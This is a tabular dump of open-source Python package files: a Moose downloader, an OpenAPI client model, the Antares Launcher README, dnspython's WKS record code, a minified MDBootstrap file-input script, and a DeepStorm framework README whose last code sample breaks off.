id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7 values |
|---|---|---|
/Moose-0.9.9b3.tar.gz/Moose-0.9.9b3/moose/models/downloader.py | from __future__ import unicode_literals
import os
import socket
import Queue
import urllib2
import httplib
from moose.utils._os import makedirs, makeparents, safe_join
from moose.utils.encoding import force_bytes
from moose.utils.module_loading import import_string
from moose.conf import settings
"""
Provides an uniform interface with multithreading, but in a blocked way.
The reason we provide the blocked worker is to offer a way to debug,
espacially when using actions like `export`.
"""
if settings.DEBUG:
import dummy_threading as _threading
else:
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
lock = _threading.Lock()
import logging
logger = logging.getLogger(__name__)
class DownloadWorker(_threading.Thread):
def __init__(self, queue, callback, stats, timeout, overwrite=False):
super(DownloadWorker, self).__init__()
self.queue = queue
self.callback = callback
# a mutex to count in threads
self.stats = stats
self.timeout = timeout
self.overwrite = overwrite
def run(self):
while True:
try:
data_model = self.queue.get(timeout=self.timeout)
if not self.overwrite and \
os.path.exists(data_model.dest_filepath):
self.stats.inc_value("download/conflict")
else:
data = self.fetch(data_model.filelink, data_model.retry)
if data != None:
self.write(data, data_model.dest_filepath)
self.callback(data_model)
self.stats.inc_value("download/ok")
else:
if data_model.retry > 0:
data_model.retry -= 1
self.queue.put(data_model)
self.stats.inc_value("download/retry")
else:
self.stats.inc_value("download/failed")
self.queue.task_done()
except Queue.Empty as e:
break
def fetch(self, url, retry):
data = None
# Logs error only if it was the last time to try
warn = logger.error if retry == 0 else logger.info
try:
response = urllib2.urlopen(url, timeout=self.timeout)
data = response.read()
except urllib2.HTTPError, e:
self.stats.inc_value("download/http_error")
warn('falied to connect to %s, may for %s' % (url, e.reason))
except urllib2.URLError, e:
self.stats.inc_value("download/url_error")
warn('unable to open url %s for %s' % (url, e.reason))
except socket.error, e:
self.stats.inc_value("download/socket_error")
warn('socket error: %s' % url)
except httplib.BadStatusLine, e:
self.stats.inc_value("download/bad_status_line")
warn('BadStatusLine: %s' % url)
return data
def write(self, data, filepath):
lock.acquire()
makeparents(filepath)
lock.release()
with open(filepath, 'wb') as f:
f.write(data)
return
class ModelDownloader(object):
DEFAULT_WORKER_CLASS = "moose.models.downloader.DownloadWorker"
def __init__(self, callback, stats, worker_cls=None, timeout=None, overwrite=False, nworkers=10):
self.queue = Queue.Queue()
self.callback = callback
self.stats = stats
self.timeout = timeout or settings.DEFAULT_TIMEOUT
self.overwrite = overwrite
# Run in one loop if setting DEBUG mode
self.nworkers = nworkers
worker_cls_str = worker_cls if worker_cls else self.DEFAULT_WORKER_CLASS
self.worker_cls = import_string(worker_cls_str)
def start(self):
if not settings.DEBUG:
for i in range(self.nworkers):
worker = self.worker_cls(self.queue, self.callback, self.stats, \
self.timeout, self.overwrite)
worker.setDaemon(True)
worker.start()
def add_task(self, data_model):
try:
# For every models, we would like to try to fetch
# data from urls the model provides for 3 times,
# and give up if it never succeed.
data_model.retry = 3
self.queue.put(data_model)
except Queue.Full as e:
logger.error('Try to put an element in a full queue.')
raise e
def join(self):
if settings.DEBUG:
# waitting for data to be handled one by one
_worker = self.worker_cls(
self.queue, self.callback, self.stats, self.timeout, self.overwrite)
_worker.start()
else:
self.queue.join() | PypiClean |
/Altair%20Smartworks%20SDK-0.0.1.tar.gz/Altair Smartworks SDK-0.0.1/openapi_client/model/event_high_cpu_list_response.py | import re # noqa: F401
import sys # noqa: F401
from openapi_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from openapi_client.model.collection_list_response_paging import CollectionListResponsePaging
globals()['CollectionListResponsePaging'] = CollectionListResponsePaging
class EventHighCPUListResponse(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'data': ([object],), # noqa: E501
'paging': (CollectionListResponsePaging,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'data': 'data', # noqa: E501
'paging': 'paging', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""EventHighCPUListResponse - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
data ([object]): [optional] # noqa: E501
paging (CollectionListResponsePaging): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value) | PypiClean |
/Antares_Launcher-1.3.0.tar.gz/Antares_Launcher-1.3.0/README.md | # Antares Launcher
This program is intended to allow the user to send a list of Antares simulations to
a remote Linux machine that can run them using *SLURM Workload Manager*.
Currently, this program:
- Is configured to work with Antares studies from version 7.0 through 8.5
(the configuration can be changed in a YAML file).
- needs a remote UNIX server that uses *SLURM Workload Manager*.
The main workflow diagram is as follows:

## Requirements
See [`setup.py`](https://github.com/AntaresSimulatorTeam/antares-launcher/blob/main/setup.py)
Minimum version : python 3.8
### Main Python libraries
The following libraries are required to run the application in a production (or staging) environment:
- paramiko
- PyYAML
- tinydb
- tqdm
To install this library on production, you can run:
```shell
pip install Antares-Launcher
```
### Development and Unit Testing
To start developing, you can clone the repository from GitHub and create a Python virtualenv:
```shell
cd ~/workspace/
git clone https://github.com/AntaresSimulatorTeam/antares-launcher.git
cd ~/workspace/antares-launcher/
python3 -m venv venv
source venv/bin/activate
```
To run the unit tests, you need to install:
- pytest
- pytest-cov
- pytest-xdist
To install this library in development mode for testing, you can run:
```shell
pip install -e .[test]
```
Additional dependencies could also be used for development, for instance:
- black
- check-manifest
- isort
- mypy
### Documentation
In this project, we use Sphinx to generate the documentation.
Extra requirements are:
- m2r
- recommonmark
- sphinx
- sphinx_rtd_theme
## Installation
### Generation of the binary executable
In order to generate the binary file, execute the following command:
```
pyinstaller --additional-hooks-dir=antareslauncher/hooks/ -F antareslauncher/main_launcher.py -n Antares_Launcher
```
In order to generate the binary file of the light version of the launcher (reduced set of options), execute the
following command:
```
pyinstaller --additional-hooks-dir=antareslauncher/hooks/ -F antareslauncher/main_launcher_light.py -n Antares_Launcher_Light
```
The generated file will be inside the dist directory. Note that pyinstaller does not enable the cross-compilation: e
binary file generated on windows can only be expected with the windows OS
## Use Antares_Launcher
### Run Antares_Launcher
**Antares Launcher** can be used by running the executable file
By default, the program will:
- look for a configuration file necessary for the connection
named *ssh_config.json*.
If no value is given, it will look for it in default location with this order:
- 1st: current working directory
- 2nd: $HOME/antares_launcher_settings/ssh_config.json
- 3rd: default configuration (json file embedded in the data directory if present).
A default *ssh_config.json* file can be found in this
repository in the `./data` directory of the project
- look for an rsa-private ssh-key to access to the remote server.
The path of the key is specified in the `ssh_config.json` file
- look for a directory containing
the Antares studies to be run on the remote machine
named *STUDIES-IN*.
- put the results in the directory named
*FINISHED*
- create a directory *LOGS* that contains the logs of the programs
and several directories containing the three log files specific of each simulation.
Currently **antares_launcher** uses a specific configuration attached to the specific setting of
`data/launchAntares-${SCRIPT-VERSION}.sh`
#### Get the *how-to*
```
Antares_Launcher --help
```
will show how to use the program.
### SLURM script on the remote machine
In order to submit new jobs to the *SLURM* queue manager,
**Antares_Launcher** launches a bash-SLURM script the name of the script is set in `data/configuration.yaml`.
If Antares_Launcher fails to find this script
an exception will be raised and the execution will stop.
The specification of the script can be found in the class
`SlurmScriptFeatures` in the module `antareslauncher.slurm_script_features.py`.
See [Deploy Antares Launcher](#deploy-antares-launcher) for specific values.
## Useful commands
Since the addition of the Makefile to the project, one can now easily set a virtual environment, install requirements,
generate binary file, run tests, generate the doc and deploy it...
At the root of the directory, all the available commands can be seen with typing: make

If for example, you would like to run the test, a simple ``make test`` will do the trick

## Useful commands
Run unit tests:
```shell
pytest -v tests/
```
Run unit tests with code coverage:
```shell
pytest --cov=antareslauncher --cov-report=term-missing --cov-report=html --cov-branch tests/
open htmlcov/index.html
```
# Deploy Antares Launcher
## Installation on the remote server
In order to be able to accept jobs from Antares_Launcher, the remote machine needs to be ready:
the binaries and script expected by **Antares_Launcher** need to be installed and
the required ssh-public-keys need to be added to the `authorizedkeys` file
of the account of the remote server.
### Things to do
- `launchAntares-${SCRIPT-VERSION}.sh` should be copied to the remove server
and ist path should be set in `data/configuration.yaml`
- Install the Antares solver binary `antares-x.x-solver` on the remote server.
set its installation path in `launchAntares-${SCRIPT-VERSION}.sh`
- The R Xpansion script, `data/XpansionArgsRun.R`,
has to be copied to the remote server and
its path should be set in `launchAntares-${SCRIPT-VERSION}.sh`.
#### Important notice
The users currently copy the executable every time they need to use it.
This is not practical, an alternative should be developed.
## Installation of R packages on the remote server
In order to correctly install or update packages to be used on the remote server
the *R*repositories and installation-destination need to be set.
The `launchAntares-${SCRIPT-VERSION}.sh` set the variable where the *R*libraries are installed runtime,
no need to create a `.Renviron` file.
| PypiClean |
/Electrum-VTC-2.9.3.3.tar.gz/Electrum-VTC-2.9.3.3/packages/dns/rdtypes/IN/WKS.py |
import socket
import struct
import dns.ipv4
import dns.rdata
from dns._compat import xrange
_proto_tcp = socket.getprotobyname('tcp')
_proto_udp = socket.getprotobyname('udp')
class WKS(dns.rdata.Rdata):
"""WKS record
@ivar address: the address
@type address: string
@ivar protocol: the protocol
@type protocol: int
@ivar bitmap: the bitmap
@type bitmap: string
@see: RFC 1035"""
__slots__ = ['address', 'protocol', 'bitmap']
def __init__(self, rdclass, rdtype, address, protocol, bitmap):
super(WKS, self).__init__(rdclass, rdtype)
self.address = address
self.protocol = protocol
if not isinstance(bitmap, bytearray):
self.bitmap = bytearray(bitmap)
else:
self.bitmap = bitmap
def to_text(self, origin=None, relativize=True, **kw):
bits = []
for i in xrange(0, len(self.bitmap)):
byte = self.bitmap[i]
for j in xrange(0, 8):
if byte & (0x80 >> j):
bits.append(str(i * 8 + j))
text = ' '.join(bits)
return '%s %d %s' % (self.address, self.protocol, text)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
address = tok.get_string()
protocol = tok.get_string()
if protocol.isdigit():
protocol = int(protocol)
else:
protocol = socket.getprotobyname(protocol)
bitmap = bytearray()
while 1:
token = tok.get().unescape()
if token.is_eol_or_eof():
break
if token.value.isdigit():
serv = int(token.value)
else:
if protocol != _proto_udp and protocol != _proto_tcp:
raise NotImplementedError("protocol must be TCP or UDP")
if protocol == _proto_udp:
protocol_text = "udp"
else:
protocol_text = "tcp"
serv = socket.getservbyname(token.value, protocol_text)
i = serv // 8
l = len(bitmap)
if l < i + 1:
for j in xrange(l, i + 1):
bitmap.append(0)
bitmap[i] = bitmap[i] | (0x80 >> (serv % 8))
bitmap = dns.rdata._truncate_bitmap(bitmap)
return cls(rdclass, rdtype, address, protocol, bitmap)
def to_wire(self, file, compress=None, origin=None):
file.write(dns.ipv4.inet_aton(self.address))
protocol = struct.pack('!B', self.protocol)
file.write(protocol)
file.write(self.bitmap)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
address = dns.ipv4.inet_ntoa(wire[current: current + 4])
protocol, = struct.unpack('!B', wire[current + 4: current + 5])
current += 5
rdlen -= 5
bitmap = wire[current: current + rdlen].unwrap()
return cls(rdclass, rdtype, address, protocol, bitmap) | PypiClean |
/Flask-MDBootstrap-3.0.5.tar.gz/Flask-MDBootstrap-3.0.5/flask_mdbootstrap/static/MDB-Pro/js/modules/file-input.min.js | !function(t){var n={};function r(e){if(n[e])return n[e].exports;var o=n[e]={i:e,l:!1,exports:{}};return t[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t.__esModule)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var o in t)r.d(e,o,function(n){return t[n]}.bind(null,o));return e},r.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=156)}([function(t,n,r){(function(n){var r=function(t){return t&&t.Math==Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof n&&n)||Function("return this")()}).call(this,r(54))},function(t,n){t.exports=function(t){try{return!!t()}catch(t){return!0}}},function(t,n,r){var e=r(0),o=r(12),u=r(26),i=r(46),c=e.Symbol,f=o("wks");t.exports=function(t){return f[t]||(f[t]=i&&c[t]||(i?c:u)("Symbol."+t))}},function(t,n){var r={}.hasOwnProperty;t.exports=function(t,n){return r.call(t,n)}},function(t,n,r){var e=r(0),o=r(22).f,u=r(6),i=r(14),c=r(21),f=r(47),a=r(48);t.exports=function(t,n){var r,s,p,l,v,y=t.target,d=t.global,h=t.stat;if(r=d?e:h?e[y]||c(y,{}):(e[y]||{}).prototype)for(s in n){if(l=n[s],p=t.noTargetGet?(v=o(r,s))&&v.value:r[s],!a(d?s:y+(h?".":"#")+s,t.forced)&&void 0!==p){if(typeof l==typeof p)continue;f(l,p)}(t.sham||p&&p.sham)&&u(l,"sham",!0),i(r,s,l,t)}}},function(t,n){t.exports=function(t){return"object"==typeof t?null!==t:"function"==typeof t}},function(t,n,r){var e=r(7),o=r(9),u=r(18);t.exports=e?function(t,n,r){return o.f(t,n,u(1,r))}:function(t,n,r){return t[n]=r,t}},function(t,n,r){var e=r(1);t.exports=!e((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a}))},function(t,n,r){var e=r(5);t.exports=function(t){if(!e(t))throw TypeError(String(t)+" is not an object");return t}},function(t,n,r){var e=r(7),o=r(33),u=r(8),i=r(20),c=Object.defineProperty;n.f=e?c:function(t,n,r){if(u(t),n=i(n,!0),u(r),o)try{return c(t,n,r)}catch(t){}if("get"in r||"set"in r)throw TypeError("Accessors not supported");return"value"in r&&(t[n]=r.value),t}},function(t,n,r){var e=r(27),o=r(13);t.exports=function(t){return e(o(t))}},function(t,n,r){var e=r(15),o=Math.min;t.exports=function(t){return t>0?o(e(t),9007199254740991):0}},function(t,n,r){var e=r(30),o=r(55);(t.exports=function(t,n){return o[t]||(o[t]=void 0!==n?n:{})})("versions",[]).push({version:"3.3.2",mode:e?"pure":"global",copyright:"© 2019 Denis Pushkarev (zloirock.ru)"})},function(t,n){t.exports=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t}},function(t,n,r){var e=r(0),o=r(12),u=r(6),i=r(3),c=r(21),f=r(34),a=r(28),s=a.get,p=a.enforce,l=String(f).split("toString");o("inspectSource",(function(t){return f.call(t)})),(t.exports=function(t,n,r,o){var f=!!o&&!!o.unsafe,a=!!o&&!!o.enumerable,s=!!o&&!!o.noTargetGet;"function"==typeof r&&("string"!=typeof n||i(r,"name")||u(r,"name",n),p(r).source=l.join("string"==typeof n?n:"")),t!==e?(f?!s&&t[n]&&(a=!0):delete t[n],a?t[n]=r:u(t,n,r)):a?t[n]=r:c(n,r)})(Function.prototype,"toString",(function(){return"function"==typeof this&&s(this).source||f.call(this)}))},function(t,n){var r=Math.ceil,e=Math.floor;t.exports=function(t){return isNaN(t=+t)?0:(t>0?e:r)(t)}},function(t,n,r){var e=r(13);t.exports=function(t){return Object(e(t))}},function(t,n){var r={}.toString;t.exports=function(t){return r.call(t).slice(8,-1)}},function(t,n){t.exports=function(t,n){return{enumerable:!(1&t),configurable:!(2&t),writable:!(4&t),value:n}}},function(t,n){t.exports={}},function(t,n,r){var e=r(5);t.exports=function(t,n){if(!e(t))return t;var r,o;if(n&&"function"==typeof(r=t.toString)&&!e(o=r.call(t)))return o;if("function"==typeof(r=t.valueOf)&&!e(o=r.call(t)))return o;if(!n&&"function"==typeof(r=t.toString)&&!e(o=r.call(t)))return o;throw TypeError("Can't convert object to primitive value")}},function(t,n,r){var e=r(0),o=r(6);t.exports=function(t,n){try{o(e,t,n)}catch(r){e[t]=n}return n}},function(t,n,r){var e=r(7),o=r(40),u=r(18),i=r(10),c=r(20),f=r(3),a=r(33),s=Object.getOwnPropertyDescriptor;n.f=e?s:function(t,n){if(t=i(t),n=c(n,!0),a)try{return s(t,n)}catch(t){}if(f(t,n))return u(!o.f.call(t,n),t[n])}},function(t,n){t.exports=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"]},function(t,n,r){var e=r(57),o=r(27),u=r(16),i=r(11),c=r(42),f=[].push,a=function(t){var n=1==t,r=2==t,a=3==t,s=4==t,p=6==t,l=5==t||p;return function(v,y,d,h){for(var g,x,b=u(v),m=o(b),j=e(y,d,3),O=i(m.length),w=0,S=h||c,P=n?S(v,O):r?S(v,0):void 0;O>w;w++)if((l||w in m)&&(x=j(g=m[w],w,b),t))if(n)P[w]=x;else if(x)switch(t){case 3:return!0;case 5:return g;case 6:return w;case 2:f.call(P,g)}else if(s)return!1;return p?-1:a||s?s:P}};t.exports={forEach:a(0),map:a(1),filter:a(2),some:a(3),every:a(4),find:a(5),findIndex:a(6)}},function(t,n,r){var e=r(12),o=r(26),u=e("keys");t.exports=function(t){return u[t]||(u[t]=o(t))}},function(t,n){var r=0,e=Math.random();t.exports=function(t){return"Symbol("+String(void 0===t?"":t)+")_"+(++r+e).toString(36)}},function(t,n,r){var e=r(1),o=r(17),u="".split;t.exports=e((function(){return!Object("z").propertyIsEnumerable(0)}))?function(t){return"String"==o(t)?u.call(t,""):Object(t)}:Object},function(t,n,r){var e,o,u,i=r(56),c=r(0),f=r(5),a=r(6),s=r(3),p=r(25),l=r(19),v=c.WeakMap;if(i){var y=new v,d=y.get,h=y.has,g=y.set;e=function(t,n){return g.call(y,t,n),n},o=function(t){return d.call(y,t)||{}},u=function(t){return h.call(y,t)}}else{var x=p("state");l[x]=!0,e=function(t,n){return a(t,x,n),n},o=function(t){return s(t,x)?t[x]:{}},u=function(t){return s(t,x)}}t.exports={set:e,get:o,has:u,enforce:function(t){return u(t)?o(t):e(t,{})},getterFor:function(t){return function(n){var r;if(!f(n)||(r=o(n)).type!==t)throw TypeError("Incompatible receiver, "+t+" required");return r}}}},function(t,n,r){var e=r(37),o=r(23).concat("length","prototype");n.f=Object.getOwnPropertyNames||function(t){return e(t,o)}},function(t,n){t.exports=!1},function(t,n,r){var e=r(17);t.exports=Array.isArray||function(t){return"Array"==e(t)}},function(t,n,r){var e=r(45),o=r(0),u=function(t){return"function"==typeof t?t:void 0};t.exports=function(t,n){return arguments.length<2?u(e[t])||u(o[t]):e[t]&&e[t][n]||o[t]&&o[t][n]}},function(t,n,r){var e=r(7),o=r(1),u=r(36);t.exports=!e&&!o((function(){return 7!=Object.defineProperty(u("div"),"a",{get:function(){return 7}}).a}))},function(t,n,r){var e=r(12);t.exports=e("native-function-to-string",Function.toString)},function(t,n,r){var e=r(8),o=r(63),u=r(23),i=r(19),c=r(64),f=r(36),a=r(25)("IE_PROTO"),s=function(){},p=function(){var t,n=f("iframe"),r=u.length;for(n.style.display="none",c.appendChild(n),n.src=String("javascript:"),(t=n.contentWindow.document).open(),t.write("<script>document.F=Object<\/script>"),t.close(),p=t.F;r--;)delete p.prototype[u[r]];return p()};t.exports=Object.create||function(t,n){var r;return null!==t?(s.prototype=e(t),r=new s,s.prototype=null,r[a]=t):r=p(),void 0===n?r:o(r,n)},i[a]=!0},function(t,n,r){var e=r(0),o=r(5),u=e.document,i=o(u)&&o(u.createElement);t.exports=function(t){return i?u.createElement(t):{}}},function(t,n,r){var e=r(3),o=r(10),u=r(39).indexOf,i=r(19);t.exports=function(t,n){var r,c=o(t),f=0,a=[];for(r in c)!e(i,r)&&e(c,r)&&a.push(r);for(;n.length>f;)e(c,r=n[f++])&&(~u(a,r)||a.push(r));return a}},function(t,n,r){var e=r(15),o=Math.max,u=Math.min;t.exports=function(t,n){var r=e(t);return r<0?o(r+n,0):u(r,n)}},function(t,n,r){var e=r(10),o=r(11),u=r(38),i=function(t){return function(n,r,i){var c,f=e(n),a=o(f.length),s=u(i,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:i(!0),indexOf:i(!1)}},function(t,n,r){"use strict";var e={}.propertyIsEnumerable,o=Object.getOwnPropertyDescriptor,u=o&&!e.call({1:2},1);n.f=u?function(t){var n=o(this,t);return!!n&&n.enumerable}:e},function(t,n,r){var e=r(37),o=r(23);t.exports=Object.keys||function(t){return e(t,o)}},function(t,n,r){var e=r(5),o=r(31),u=r(2)("species");t.exports=function(t,n){var r;return o(t)&&("function"!=typeof(r=t.constructor)||r!==Array&&!o(r.prototype)?e(r)&&null===(r=r[u])&&(r=void 0):r=void 0),new(void 0===r?Array:r)(0===n?0:n)}},function(t,n){n.f=Object.getOwnPropertySymbols},function(t,n,r){"use strict";var e=r(4),o=r(24).find,u=r(51),i=!0;"find"in[]&&Array(1).find((function(){i=!1})),e({target:"Array",proto:!0,forced:i},{find:function(t){return o(this,t,arguments.length>1?arguments[1]:void 0)}}),u("find")},function(t,n,r){t.exports=r(0)},function(t,n,r){var e=r(1);t.exports=!!Object.getOwnPropertySymbols&&!e((function(){return!String(Symbol())}))},function(t,n,r){var e=r(3),o=r(53),u=r(22),i=r(9);t.exports=function(t,n){for(var r=o(n),c=i.f,f=u.f,a=0;a<r.length;a++){var s=r[a];e(t,s)||c(t,s,f(n,s))}}},function(t,n,r){var e=r(1),o=/#|\.prototype\./,u=function(t,n){var r=c[i(t)];return r==a||r!=f&&("function"==typeof n?e(n):!!n)},i=u.normalize=function(t){return String(t).replace(o,".").toLowerCase()},c=u.data={},f=u.NATIVE="N",a=u.POLYFILL="P";t.exports=u},function(t,n){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},function(t,n,r){var e=r(1),o=r(2)("species");t.exports=function(t){return!e((function(){var n=[];return(n.constructor={})[o]=function(){return{foo:1}},1!==n[t](Boolean).foo}))}},function(t,n,r){var e=r(2),o=r(35),u=r(6),i=e("unscopables"),c=Array.prototype;null==c[i]&&u(c,i,o(null)),t.exports=function(t){c[i][t]=!0}},function(t,n,r){"use strict";var e=r(1);t.exports=function(t,n){var r=[][t];return!r||!e((function(){r.call(null,n||function(){throw 1},1)}))}},function(t,n,r){var e=r(32),o=r(29),u=r(43),i=r(8);t.exports=e("Reflect","ownKeys")||function(t){var n=o.f(i(t)),r=u.f;return r?n.concat(r(t)):n}},function(t,n){var r;r=function(){return this}();try{r=r||new Function("return this")()}catch(t){"object"==typeof window&&(r=window)}t.exports=r},function(t,n,r){var e=r(0),o=r(21),u=e["__core-js_shared__"]||o("__core-js_shared__",{});t.exports=u},function(t,n,r){var e=r(0),o=r(34),u=e.WeakMap;t.exports="function"==typeof u&&/native code/.test(o.call(u))},function(t,n,r){var e=r(49);t.exports=function(t,n,r){if(e(t),void 0===n)return t;switch(r){case 0:return function(){return t.call(n)};case 1:return function(r){return t.call(n,r)};case 2:return function(r,e){return t.call(n,r,e)};case 3:return function(r,e,o){return t.call(n,r,e,o)}}return function(){return t.apply(n,arguments)}}},,,,,,function(t,n,r){var e=r(7),o=r(9),u=r(8),i=r(41);t.exports=e?Object.defineProperties:function(t,n){u(t);for(var r,e=i(n),c=e.length,f=0;c>f;)o.f(t,r=e[f++],n[r]);return t}},function(t,n,r){var e=r(32);t.exports=e("document","documentElement")},,,,,,,,,,,,,,function(t,n,r){"use strict";var e=r(4),o=r(27),u=r(10),i=r(52),c=[].join,f=o!=Object,a=i("join",",");e({target:"Array",proto:!0,forced:f||a},{join:function(t){return c.call(u(this),void 0===t?",":t)}})},,,,,,,,,,,,,,,,,,,,function(t,n,r){"use strict";var e=r(4),o=r(24).map;e({target:"Array",proto:!0,forced:!r(50)("map")},{map:function(t){return o(this,t,arguments.length>1?arguments[1]:void 0)}})},,,,,,,,,,,,,,,,,,,,,,,,function(t,n,r){var e=r(7),o=r(9).f,u=Function.prototype,i=u.toString,c=/^\s*function ([^ (]*)/;!e||"name"in u||o(u,"name",{configurable:!0,get:function(){try{return i.call(this).match(c)[1]}catch(t){return""}}})},,,,,,,,,,,function(t,n,r){var e=r(4),o=r(134).values;e({target:"Object",stat:!0},{values:function(t){return o(t)}})},function(t,n,r){var e=r(7),o=r(41),u=r(10),i=r(40).f,c=function(t){return function(n){for(var r,c=u(n),f=o(c),a=f.length,s=0,p=[];a>s;)r=f[s++],e&&!i.call(c,r)||p.push(t?[r,c[r]]:c[r]);return p}};t.exports={entries:c(!0),values:c(!1)}},,,,,,,,,,,,,,,,,,,,,,function(t,n,r){"use strict";r.r(n);r(44),r(78),r(98),r(122),r(133);jQuery((function(t){t(document).on("change",'.file-field input[type="file"]',(function(){var n=t(this),r=n.closest(".file-field").find("input.file-path"),e=n.get(0).files,o=[];o=Array.isArray(e)?e.map((function(t){return t.name})):Object.values(e).map((function(t){return t.name})),r.val(o.join(", ")),r.trigger("change")}))}))}]); | PypiClean |
/DeepStorm-1.0.5.tar.gz/DeepStorm-1.0.5/README.md | # DeepStorm: Deep Learning Framework
## Summary:
Deep Learning Framework from scratch, with an API of a combination of pytorch and keras APIs, only uses numpy for tensor operations.
## Pip install:
```sh
pip install DeepStorm
```
## Layers & DL classes in framework:
- Conv2d
- MaxPool2d
- BatchNorm2d
- Flatten
- Dropout
- Linear
- ReLU
- Softmax
- SgdWithMomentum
- Adam
- CrossEntropyLoss
- Xavier
- He
## Model building:
```py
layers = [
Conv2d(in_channels=1, out_channels=32,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(32),
Dropout(probability=0.3),
ReLU(),
Conv2d(in_channels=32, out_channels=64,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(64),
ReLU(),
MaxPool2d(kernel_size=2, stride=2),
Conv2d(in_channels=64, out_channels=64,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(64),
ReLU(),
MaxPool2d(kernel_size=2, stride=2),
Flatten(),
Linear(in_features=64*7*7, out_features=128),
ReLU(),
Linear(128, 64),
ReLU(),
Linear(64, 10),
SoftMax(),
]
model = Model(layers)
```
Or
```py
model = Model()
model.append_layer(Conv2d(in_channels=1, out_channels=32,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(32))
model.append_layer(ReLU())
model.append_layer(Conv2d(in_channels=32, out_channels=64,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(64))
model.append_layer(ReLU())
model.append_layer(MaxPool2d(kernel_size=2, stride=2))
model.append_layer(Conv2d(in_channels=64, out_channels=64,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(64))
model.append_layer(ReLU())
model.append_layer(MaxPool2d(kernel_size=2, stride=2))
model.append_layer(Flatten())
model.append_layer(Linear(in_features=64*7*7, out_features=128))
model.append_layer(ReLU())
model.append_layer(Linear(in_features=128, out_features=64))
